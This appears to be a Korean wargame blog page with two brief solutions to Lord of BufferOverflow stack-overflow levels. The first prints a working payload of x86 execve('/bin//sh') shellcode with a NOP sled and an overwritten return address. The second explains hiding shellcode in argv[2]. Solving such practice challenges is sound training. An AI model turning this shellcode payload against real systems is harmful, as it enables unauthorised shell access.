반응형


이번에는 argv[1]을 48까지 한정하지만

ret을 모두 덮는데 48바이트만 필요하므로 상관이 없습니다.


Shellcode[40]+sfp+ret

으로 argv[1]에다 넣어주면 됩니다.


PayLoad

`python -c 'print "\x90"*16+"\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f

\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

+"AAAA"+"\x06\xfc\xff\xbf"'`







'Pwnable > LOB' 카테고리의 다른 글

LOB 5. Orc  (0) 2015.09.23
LOB 4. Goblin  (0) 2015.09.20
LOB 3. Cobolt  (0) 2015.09.17
LOB 2. Gremlin  (0) 2015.09.12
LOB 1. Gate  (0) 2015.09.08
반응형



이번 문제는 환경변수와 버퍼까지 지워버립니다.

하지만 아직 까지는 스택을 사용해야 합니다.

이때 우리는 argv배열이 

스택 상단부에 저장된다는 것을 생각해야 합니다.

그러므로 우리는 argv[2]번째에 쉘코드를 넣어 실행할 수 있습니다.



0xbfffffc4b 부터 argv[2]가 있는 것을 알 수 있습니다.


'Pwnable > LOB' 카테고리의 다른 글

LOB 6. Wolfman  (0) 2015.09.25
LOB 4. Goblin  (0) 2015.09.20
LOB 3. Cobolt  (0) 2015.09.17
LOB 2. Gremlin  (0) 2015.09.12
LOB 1. Gate  (0) 2015.09.08

+ Recent posts